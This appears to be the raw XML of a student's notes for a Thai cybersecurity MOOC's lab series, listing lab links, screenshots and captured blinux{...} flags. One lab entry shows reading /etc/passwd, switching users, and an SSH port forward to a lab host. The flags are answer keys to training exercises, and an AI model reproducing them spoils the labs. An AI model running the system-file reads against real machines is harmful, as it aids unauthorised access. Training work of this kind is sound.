    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="36F2023C" w14:textId="77777777">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="7D4C9634" w14:textId="77777777"/>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="7E2B43FF" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId27">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/57</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00463A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="5CDC7842" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59AF8700" wp14:editId="4581882E">
            <wp:extent cx="4197591" cy="2714980"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="28575"/>
            <wp:docPr id="9661340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34075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3846" cy="27190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63A60" w:rsidP="00463A60" w:rsidRDefault="00463A60" w14:paraId="10FE681A" w14:textId="77777777"/>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="10BC974B" w14:textId="307DAAE9">
      <w:hyperlink w:history="1" r:id="rId29">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/58</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="3B4FF44E" w14:textId="180E72EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D5B852C" wp14:editId="66020C83">
            <wp:extent cx="5943600" cy="1388110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="165767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736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014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="42A98FD4" w14:textId="36ACA207">
      <w:hyperlink w:history="1" r:id="rId31">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/59</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="4F941B5A" w14:textId="13DA9872">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44170190" wp14:editId="22A6B06B">
            <wp:extent cx="5943600" cy="1595120"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="17054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32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014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="203A01DB" w14:textId="77777777"/>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="52FA90FF" w14:textId="4D985A05">
      <w:hyperlink w:history="1" r:id="rId33">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/61</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="1BD8FF44" w14:textId="1D6AE4CD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D8408D" wp14:editId="107E942A">
            <wp:extent cx="5943600" cy="839470"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17780"/>
            <wp:docPr id="724739722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39722" name="Picture 1" descr="A number on a white background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F2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="6E95747F" w14:textId="77777777"/>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="5C4A7474" w14:textId="5F0158FD">
      <w:hyperlink w:history="1" r:id="rId35">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/62</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="302AFAE6" w14:textId="3C7CBC0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="184748BE" wp14:editId="184F169B">
            <wp:extent cx="5943600" cy="1062355"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
            <wp:docPr id="1655097092" name="Picture 1" descr="A number and a line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97092" name="Picture 1" descr="A number and a line of number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F2014" w:rsidRDefault="00CF2014" w14:paraId="5B047632" w14:textId="77777777"/>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="49E81906" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId37">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/62</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="5E3F9FF3" w14:textId="74CD757C">
      <w:pPr>
        <w:rPr>
          <w:cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0921180D" wp14:editId="25809357">
            <wp:extent cx="5943600" cy="1087755"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17145"/>
            <wp:docPr id="156047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730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7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F2014" w:rsidRDefault="00CF2014" w14:paraId="51650621" w14:textId="646C51B4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{T1VQELi5g8}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="0D824D85" w14:textId="77777777"/>
    <w:p w:rsidR="00CF2014" w:rsidP="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="4670A998" w14:textId="5B7DE4B9">
      <w:hyperlink w:history="1" r:id="rId39">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/63</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CF2014" w:rsidRDefault="00CF2014" w14:paraId="107A7F41" w14:textId="2E136E11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A724F21" wp14:editId="621640DB">
            <wp:extent cx="5943600" cy="1057275"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="25123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310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F2014" w:rsidRDefault="00CF2014" w14:paraId="7700895B" w14:textId="7C9C86AF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{S4PQpIazCw}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidRDefault="005E6830" w14:paraId="3412E3B1" w14:textId="77777777"/>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="22E56DE4" w14:textId="77777777">
      <w:r w:rsidRPr="00CC5920">
        <w:t>https://play.mooc.ncsa.or.th/lab/66</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="56B58C0F" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00823889" wp14:editId="1EBF8ADB">
            <wp:extent cx="5943600" cy="2109470"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
            <wp:docPr id="511620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20179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E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="0DCB1031" w14:textId="77777777">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{y00Q5L2VSZ}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="4238DB20" w14:textId="77777777"/>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="1A3B44BA" w14:textId="77777777"/>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="6EC84ED6" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId42">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/67</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="15855B96" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353EB80C" wp14:editId="42276416">
            <wp:extent cx="5943600" cy="3143250"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="7382058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05824" name="Picture 1" descr="A screen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E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="38173613" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C377944" wp14:editId="773422FB">
            <wp:extent cx="5943600" cy="535940"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="135397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784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E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="6D8253A9" w14:textId="77777777"/>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="3BD075A7" w14:textId="77777777">
      <w:r w:rsidRPr="000F5D16">
        <w:t>https://play.mooc.ncsa.or.th/lab/68</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="473E59DD" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="262EEC00" wp14:editId="7120765E">
            <wp:extent cx="5943600" cy="5487035"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="18415"/>
            <wp:docPr id="9044262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26222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70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E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="3E0A5717" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0569E119" wp14:editId="49ED33C1">
            <wp:extent cx="5943600" cy="2394585"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="15341403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40391" name="Picture 1" descr="A screen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E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="2DBBE519" w14:textId="77777777"/>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="1C50BE76" w14:textId="77777777"/>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="60A76831" w14:textId="77777777">
      <w:hyperlink w:history="1" r:id="rId47">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/69</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="115509E7" w14:textId="77777777">
      <w:r w:rsidRPr="001D3BAF">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D3BAF">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D3BAF">
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="06699E31" w14:textId="77777777">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D3BAF">
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D3BAF">
        <w:t xml:space="preserve"> john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="1CE664EA" w14:textId="77777777">
      <w:r w:rsidRPr="001D3BAF">
        <w:t>cd /home/john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidP="005E6830" w:rsidRDefault="005E6830" w14:paraId="4DBA37CE" w14:textId="77777777">
      <w:r>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="154DC1C9" w:rsidRDefault="154DC1C9" w14:paraId="076478D7" w14:textId="133E11CB">
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="2D905955">
        <w:rPr/>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="18F58516" w:rsidRDefault="18F58516" w14:paraId="08A0BBCB" w14:textId="0475562B">
      <w:hyperlink r:id="R72e5788b1537495a">
        <w:r w:rsidRPr="154DC1C9" w:rsidR="18F58516">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/71</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="18F58516" w:rsidRDefault="18F58516" w14:paraId="57D060E2" w14:textId="17C42D43">
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t>ให้เข้าเครื่อง</w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t>noob</w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t>แล้วหา</w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t xml:space="preserve"> กับ </w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="18F58516">
        <w:rPr/>
        <w:t xml:space="preserve">ที่เปิดอยู่ </w:t>
      </w:r>
      <w:r w:rsidR="0CF67242">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t>ss –</w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t>tlnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="73B9A27F" w:rsidP="5F2E2CBF" w:rsidRDefault="73B9A27F" w14:paraId="435D32FA" w14:textId="2ACA0884">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="73B9A27F">
        <w:drawing>
          <wp:inline wp14:editId="47BEFFB3" wp14:anchorId="0D8D876A">
            <wp:extent cx="4505954" cy="1099419"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="588497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8497788" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId558338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5954" cy="109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B9A27F" w:rsidP="5F2E2CBF" w:rsidRDefault="73B9A27F" w14:paraId="63DCDF8C" w14:textId="3A35E16D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t>แล้ว</w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t>forwarding</w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t xml:space="preserve"> port </w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t>มาที่</w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t xml:space="preserve"> localhost:&lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t>ของเรา</w:t>
      </w:r>
      <w:r w:rsidR="73B9A27F">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="73B9A27F" w:rsidP="5F2E2CBF" w:rsidRDefault="73B9A27F" w14:paraId="0A1EE0B9" w14:textId="40AB81E8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2E2CBF" w:rsidR="73B9A27F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="73B9A27F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="58C959BC">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="73B9A27F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>:127.0.0.</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="73B9A27F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="73B9A27F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">80  </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="73B9A27F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>noob@34.124.215.80</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="355B57F2">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="6C77E588">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="6C77E588">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>เปิด</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="6C77E588">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Rc942cbc782ff4e11">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="6C77E588">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="fr-FR"/>
          </w:rPr>
          <w:t>http://localhost:8080/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="6C77E588">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="355B57F2" w:rsidP="5F2E2CBF" w:rsidRDefault="355B57F2" w14:paraId="1449A47B" w14:textId="503692F3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2E2CBF" w:rsidR="355B57F2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ssh </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="355B57F2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-L &lt;LOCAL_PORT&gt;:&lt;TARGET_MACHINE&gt;:&lt;TARGET_PORT&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F2E2CBF" w:rsidP="5F2E2CBF" w:rsidRDefault="5F2E2CBF" w14:paraId="16520F38" w14:textId="4E7B4212">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E6830" w:rsidRDefault="005E6830" w14:paraId="01DD53D3" w14:textId="77777777"/>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="42294ED3" w14:textId="77777777"/>
    <w:p w:rsidR="00005F64" w:rsidP="00005F64" w:rsidRDefault="00005F64" w14:paraId="01A548CD" w14:textId="6F564B94">
      <w:hyperlink w:history="1" r:id="rId48">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/</w:t>
        </w:r>
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="cs"/>
            <w:cs/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidP="00005F64" w:rsidRDefault="00005F64" w14:paraId="1CC41B52" w14:textId="71C7B9C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="162DE23B" wp14:editId="3BF34756">
            <wp:extent cx="5943600" cy="2229485"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="18415"/>
            <wp:docPr id="189411936" name="Picture 1" descr="A computer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1936" name="Picture 1" descr="A computer screen shot of a computer erro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05F64" w:rsidRDefault="00005F64" w14:paraId="34F3A247" w14:textId="7AD0C189">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jaqVKiKNzP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="666EF409" w14:textId="77777777"/>
    <w:p w:rsidR="00005F64" w:rsidP="00005F64" w:rsidRDefault="00005F64" w14:paraId="44EF363A" w14:textId="2426A34D">
      <w:hyperlink w:history="1" r:id="rId50">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/75</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="71181BCB" w14:textId="5E0DF146">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EDE3BE" wp14:editId="0673FB2C">
            <wp:extent cx="5943600" cy="775970"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
            <wp:docPr id="1857059044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59044" name="Picture 1" descr="A number on a white background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9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05F64" w:rsidRDefault="00005F64" w14:paraId="4681DCF1" w14:textId="445B0E7C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{wvrxcW77UH}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="057C07EA" w14:textId="77777777"/>
    <w:p w:rsidRPr="00005F64" w:rsidR="00005F64" w:rsidP="00005F64" w:rsidRDefault="00005F64" w14:paraId="5C3A9BA3" w14:textId="6A3356DF">
      <w:hyperlink w:history="1" r:id="rId52">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/7</w:t>
        </w:r>
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="cs"/>
            <w:cs/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="6577C003" w14:textId="0A61926A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D12EEF" wp14:editId="7B87D0DC">
            <wp:extent cx="5943600" cy="1337310"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="32884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4687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3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05F64" w:rsidRDefault="00005F64" w14:paraId="233B05FC" w14:textId="72806C91">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{K4ZaUXSpfV}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="65BFB13E" w14:textId="77777777"/>
    <w:p w:rsidRPr="00005F64" w:rsidR="00005F64" w:rsidP="00005F64" w:rsidRDefault="00005F64" w14:paraId="69F1E664" w14:textId="0E286E04">
      <w:hyperlink w:history="1" r:id="rId54">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/77</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="376163C8" w14:textId="7BC0DA88">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308C9D20" wp14:editId="7A6C1799">
            <wp:extent cx="5943600" cy="273050"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12700"/>
            <wp:docPr id="82995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5800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05F64" w:rsidP="00005F64" w:rsidRDefault="00005F64" w14:paraId="38E66048" w14:textId="50FC52F4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blinux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trXGAviZMx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="3F17AD56" w14:textId="77777777"/>
    <w:p w:rsidRPr="00005F64" w:rsidR="00005F64" w:rsidP="00005F64" w:rsidRDefault="00604A3A" w14:paraId="39A93A24" w14:textId="4AE810B1">
      <w:hyperlink w:history="1" r:id="rId56">
        <w:r w:rsidRPr="000063FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/78</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00005F64" w:rsidRDefault="00005F64" w14:paraId="3A87B66D" w14:textId="64DA6C90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A83BF5C" wp14:editId="5F0F6879">
            <wp:extent cx="5943600" cy="1845945"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="20955"/>
